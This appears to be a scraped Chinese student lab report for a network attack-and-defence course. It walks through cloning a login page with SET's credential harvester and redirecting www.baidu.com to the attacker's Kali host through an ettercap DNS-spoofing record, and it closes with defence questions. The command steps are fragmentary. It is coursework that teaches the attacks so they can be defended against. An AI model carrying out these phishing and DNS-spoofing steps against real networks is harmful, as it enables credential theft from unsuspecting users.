#一、实践目标
#二、实践内容
vi /etc/apache2/ports.conf
命令修改Apache的端口文件,将SET工具的访问端口改为80,如下图所示: netstat -tupln |grep 80
命令查看80端口是否被占用。无其他占用则无其他提示 apachectl start
开启Apache服务:setoolkit
打开SET工具: 1
:Social-Engineering Attacks社会工程学攻击 2
:Website Attack Vectors即钓鱼网站攻击向量 3
:Credential Harvester Attack Method即登录密码截取攻击 2
:Site Cloner进行克隆网站 192.168.2.224
,即Kali的IP 192.168.2.192
)输入攻击机IP:192.168.2.224
,按下enter
后跳转到被克隆的网页: ifconfig eth0 promisc
将kali网卡改为混杂模式;vi /etc/ettercap/etter.dns
对DNS缓存表进行修改: 添加记录:www.baidu.com A 192.168.2.224
ettercap -G
开启ettercap:eth0
后点击√
开始监听。Hosts list
中查看扫描到的存活主机 dns_spoof
即DNS欺骗的插件,双击后即可开启 (1)通常在什么场景下容易受到DNS spoof攻击?
不安全的公共局域网中,对于局域网上的其他主机,往往并没有太过于设防。
(2)在日常生活工作中如何防范以上两攻击方法?
2019-2020- 20175232 司浩楠《网络对抗技术》 Exp7 网络欺诈防范
原文:https://www.cnblogs.com/20175232-gouli/p/12898059.html